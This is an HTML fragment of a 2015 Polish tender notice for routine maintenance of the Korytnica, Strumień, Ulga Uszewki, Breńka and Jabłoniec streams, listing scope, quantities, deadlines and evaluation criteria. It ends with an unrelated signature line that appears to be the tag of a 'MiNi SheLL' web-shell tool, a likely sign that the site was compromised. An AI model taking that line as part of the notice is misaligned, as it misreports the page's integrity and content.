<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Inspektorat Rejonowy w Tarnowie, ul. Ostrogskich 5, pokój nr 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.07.2015 godzina 09:30, miejsce: Inspektorat Rejonowy w Tarnowie, ul. Ostrogskich 5, pokój nr 9.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Potoki:  Korytnica w km 0+000-7+900; Strumień w km 0+000-3+600, Ulga Uszewki w km 0+000-3+600 - konserwacja bieżąca..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Potok  Korytnica w km 0+000-7+900: Wykoszenie  porostów gęstych twardych 
ze skarp i dna z wygrabieniem i wywozem wykoszonej roślinności, łącznie 
- 47 400,00m2. Ręczne ścinanie krzaków lokalnie ze skarp potoku - 0,6ha. Oczyszczenie terenu po wykarczowaniu z drobnych gałęzi, korzeni, zgrabienie na stosy drobnych gałęzi z wywiezieniem poza obręb robót - 6 000,00m2. Hakowanie przy zarośnięciu powierzchni lustra wody do 60%, wydobycie z dna potoku roślin korzeniących, odłożenie na brzeg i rozplantowanie przy górnej krawędzi skarpy potoku - 4 840,00m2. Udrożnienie potoku o szerokości dna  1,50m i 2,00m, grubość warstwy udrożnienia 10cm z przerzuceniem na górną skarpę potoku, łącznie - 7 900,00m. Rozplantowanie wzdłuż górnej krawędzi skarpy  potoku urobku po mechanicznym udrożnieniu cieku z naniesionego materiału grubości 20cm - 7 900,00m. Likwidacja zatoru w korycie potoku i usunięcie naniesionych gałęzi, śmieci itp. (materiał zamulony) z załadowaniem i wywiezieniem materiału z rozbiórki poza teren obiektu - 2,70m3. Uwaga: Potok Korytnica w km 0+000-5+550, znajduje się na obszarze Natura 2000 Dębówka nad rzeką Uszewką PLH12120066. Prace konserwacyjne należy prowadzić zgodnie decyzją ST-I.670.27.2015.MB RDOŚ w Krakowie.
Potok Strumień w km 0+000-3+600: Wykoszenie  porostów gęstych twardych ze skarp potoku wraz z wygrabieniem wykoszonych porostów ze skarp potoku ze złożeniem wzdłuż górnej krawędzi skarpy - 21 600,00m2. Ręczne ścinanie krzaków na skarpach - 0,60ha. Oczyszczenie terenu po wykoszeniu porostów ze skarp potoku z załadowaniem na środki transportu i wywiezieniem poza obręb robót - 6 000,00m2.  Hakowanie przy zarośnięciu powierzchni lustra wody do 60% i szerokości 1,0m, wydobycie z dna potoku roślin korzeniących, odłożenie na brzeg i rozplantowanie przy górnej krawędzi skarpy potoku 
- 1 600,00m2. Udrożnienie cieku o szerokości dna 1,00m  grubość warstwy udrożnienia 20cm z przerzuceniem na górną skarpę potoku - 3 600,00m. Wywiezienie wydobytego namułu poza obszar robót - 40,00m3. Rozplantowanie wzdłuż górnej krawędzi skarpy  potoku urobku po udrożnieniu cieku o szerokości  dna 1,0m i grubości warstwy udrożnienia 0,10m 
- 2 600,00m. Oczyszczenie przepustów ramowych 2,0x2,0m z namułu o głębokości zamulenia przewodu do 1/3 wysokości średnicy - 25,00m.
Potok Ulga Uszewki w km 0+000-3+600: Wykoszenie  porostów ze skarp i dna wraz z wygrabieniem wykoszonych porostów ze skarp i dna do górnej krawędzi skarpy lub rozdrobnieniem - 21 600,00m2. Ręczne ścinanie krzaków na skarpach odrąbanie drobnych gałęzi, ścięcie rębakiem - 0,33ha. Udrożnienie potoku o szerokości dna do 2,00m, grubość warstwy udrażnianej 20cm z przerzuceniem na górną skarpę potoku, łącznie - 3 600,00m. Uwaga: Potok Ulga Uszewki w km 0+000-1+900, znajduje się na obszarze Natura 2000 Dębówka nad rzeką Uszewką PLH12120066.  Prace konserwacyjne należy prowadzić zgodnie decyzją ST-I.670.24.2015.MB RDOŚ w Krakowie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.31.11.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.10.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. warunki płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Potok Breńka w km 21+600-28+940 - konserwacja  bieżąca.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Potok Breńka w km 21+600-28+940: Wykoszenie porostów gęstych twardych 
ze skarp z wygrabieniem wykoszonych porostów ze skarp ze złożeniem w pryzmy na górnych krawędziach skarp - 44 040,00m2. Wykoszenie porostów gęstych twardych z dna potoku wraz z wygrabianiem wykoszonych porostów z dna potoku ze złożeniem w pryzmy na górnych krawędziach skarp 
- 6 204,00m2. Udrożnienie potoku warstwą 0,20m o szerokości dna 0,6m i 1,0m wraz z przepustami na trasie potoku z rozplantowaniem urobku wzdłuż górnej krawędzi skarp, ewentualnie wbudowanie w miejsca uszkodzeń skarp i brzegów z ubiciem i wyrównaniem, łącznie - 7 340,00m2.   Ścinanie (bez karczowania) zagajników średniej gęstości na 30% powierzchni skarp z rozdrobnieniem rębakiem - 1,32ha. Ścięcie nawisów ziemnych na skarpach potoku (obustronnie) pasem szerokości 1,0m i grubości do 20cm łącznie rozplantowaniem urobku i rozdrobnieniem za pomocą glebogryzarki lub brony talerzowej lub wbudowaniem w ubytki na skarpach - 14 680,00m2. Rozbiórka zatorów z gałęzi, częściowo zamulone. Złożenie materiału z rozbiórki poza krawędzią skarp - 12,00m3. Uwaga: Rozbiórki tam bobrowych należy wykonać zgodnie z decyzją ST-I.6401.37.2015.JR  RDOŚ  w Krakowie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.31.11.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. warunki płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Potok Jabłoniec w km 0+000-8+600 - konserwacja bieżąca.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Potok Jabłoniec w km 0+000-8+600: Wykoszenie porostów gęstych twardych ze skarp i wygrabianie wykoszonych porostów ze skarp ze złożeniem w pryzmy na górnych krawędziach skarp - 51 600,00m2. Wykoszenie porostów  z dna potoku i wygrabianie wykoszonych porostów z dna potoku ze złożeniem w pryzmy na górnych krawędziach skarp - 10 800,00m2. Skarpowanie brzegów potoku (obustronnie)  pasem szerokości średnio 0,8m i grubości do 20cm  łącznie  z rozplantowaniem urobku na skarpach i rozdrobnieniem za pomocą glebogryzarki lub brony talerzowej - 13 760,00m2. Ścinanie gęstych krzaków i podszycia  na 20 % powierzchni skarp z rozdrobnieniem materiału z wycinki rębakiem - 1,03ha. Udrożnienie dna potoku o szer. 0,50m, 0,80m, 1,20m i 2,50m warstwą grubości 20cm wraz z przepustami na trasie potoku z rozplantowaniem urobku wzdłuż górnej krawędzi skarp lub wbudowaniem w miejsce uszkodzeń skarp, łącznie - 8 600,00m. Rozbiórka zatorów z gałęzi, częściowo zamulone, złożenie materiału z rozbiórki poza krawędzią skarp, lokalnie na całej długości potoku - 10,00m3. Uwaga: Potok Jabłoniec  w km 1+480-4+920 znajdują się na obszarze Chronionego Krajobrazu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.31.11.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. warunki płatności - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com